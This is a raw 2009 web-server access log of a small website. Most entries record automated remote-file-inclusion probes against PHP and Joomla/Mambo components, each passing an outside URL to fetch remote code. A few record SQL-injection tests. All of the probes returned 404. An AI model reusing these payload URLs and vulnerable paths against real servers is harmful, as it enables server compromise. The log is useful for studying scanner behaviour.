74.200.195.130 - - [21/Jun/2009:08:15:58 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:16:03 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:16:03 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.189.224.21 - - [21/Jun/2009:08:17:03 -0400] "GET /logs/error_log.Q109051400%20//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
209.59.12.99 - - [21/Jun/2009:08:19:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.234.107.233 - - [21/Jun/2009:08:20:18 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:08:20:18 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:08:20:18 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:08:20:19 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
65.96.104.30 - - [21/Jun/2009:08:20:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.96.104.30 - - [21/Jun/2009:08:20:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.189.224.21 - - [21/Jun/2009:08:20:34 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.811"
65.96.104.30 - - [21/Jun/2009:08:20:34 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.96.104.30 - - [21/Jun/2009:08:20:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.189.224.21 - - [21/Jun/2009:08:20:37 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
213.189.224.21 - - [21/Jun/2009:08:20:37 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
124.0.146.100 - - [21/Jun/2009:08:20:51 -0400] "GET /logs//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.224.21 - - [21/Jun/2009:08:20:53 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
211.230.156.161 - - [21/Jun/2009:08:20:55 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:08:20:55 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:08:20:55 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:08:20:56 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
200.142.148.142 - - [21/Jun/2009:08:21:18 -0400] "GET /logs/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:08:21:18 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:08:21:48 -0400] "GET /logs/error_log.Q109060400/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:23:50 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:23:50 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:23:53 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:24:02 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:24:02 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:24:02 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:24:06 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:24:16 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:08:24:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [21/Jun/2009:08:24:26 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:24:26 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:24:34 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:24:34 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
94.76.245.15 - - [21/Jun/2009:08:24:36 -0400] "GET //trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
217.147.30.80 - - [21/Jun/2009:08:24:36 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:24:37 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.80.195.44 - - [21/Jun/2009:08:24:44 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 9.21"
217.147.30.80 - - [21/Jun/2009:08:24:45 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:08:25:10 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:25:30 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:25:32 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.234.107.233 - - [21/Jun/2009:08:25:50 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:08:25:50 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:08:25:50 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.234.107.233 - - [21/Jun/2009:08:25:52 -0400] "GET /logs/access_log.Q109060700//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:08:25:55 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
94.76.245.15 - - [21/Jun/2009:08:26:02 -0400] "GET /logs/access_log.Q109052400//trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
94.76.245.15 - - [21/Jun/2009:08:26:02 -0400] "GET //trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
94.76.245.15 - - [21/Jun/2009:08:26:02 -0400] "GET /logs//trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
217.147.30.80 - - [21/Jun/2009:08:26:10 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:08:26:11 -0400] "GET /logs/error_log.Q109060400%20%20/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:26:14 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:26:16 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
94.76.245.15 - - [21/Jun/2009:08:26:17 -0400] "GET /logs/error_log.Q109052400//trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
211.234.107.233 - - [21/Jun/2009:08:26:23 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
74.6.17.151 - - [21/Jun/2009:08:26:28 -0400] "GET /logs/access_log.Q108031000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.230.156.161 - - [21/Jun/2009:08:26:28 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:08:26:28 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:08:26:28 -0400] "GET /logs/access_log.Q109060700//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:08:26:40 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.230.156.161 - - [21/Jun/2009:08:27:09 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
213.189.224.21 - - [21/Jun/2009:08:27:32 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
213.189.224.21 - - [21/Jun/2009:08:27:34 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
213.189.224.21 - - [21/Jun/2009:08:27:34 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
213.189.224.21 - - [21/Jun/2009:08:27:45 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
217.147.30.80 - - [21/Jun/2009:08:28:11 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:11 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:11 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:08:28:20 -0400] "GET /images/logo_7.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
200.74.143.62 - - [21/Jun/2009:08:28:26 -0400] "GET /logs/access_log.Q109052900/index.php?module=My_eGallery&do=showpic&pid=' HTTP/1.0" 404 234 "-" "libwww-perl/5.805"
200.74.143.62 - - [21/Jun/2009:08:28:26 -0400] "GET /index.php?module=My_eGallery&do=showpic&pid=' HTTP/1.0" 404 207 "-" "libwww-perl/5.805"
200.74.143.62 - - [21/Jun/2009:08:28:26 -0400] "GET /logs/index.php?module=My_eGallery&do=showpic&pid=' HTTP/1.0" 404 212 "-" "libwww-perl/5.805"
217.147.30.80 - - [21/Jun/2009:08:28:31 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:32 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:33 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:35 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:36 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:36 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:36 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:36 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:40 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:42 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:43 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:43 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:54 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:54 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:28:56 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:04 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:04 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:04 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:05 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:05 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:07 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:07 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:07 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:07 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:08:29:17 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:08:29:17 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:08:29:18 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:29:18 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
209.59.12.99 - - [21/Jun/2009:08:29:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [21/Jun/2009:08:29:31 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:33 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:08:29:39 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:08:29:39 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:29:39 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:08:29:39 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:08:30:17 -0400] "GET /logs/access_log.Q109051500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:08:31:28 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:31:29 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:31:29 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:31:39 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
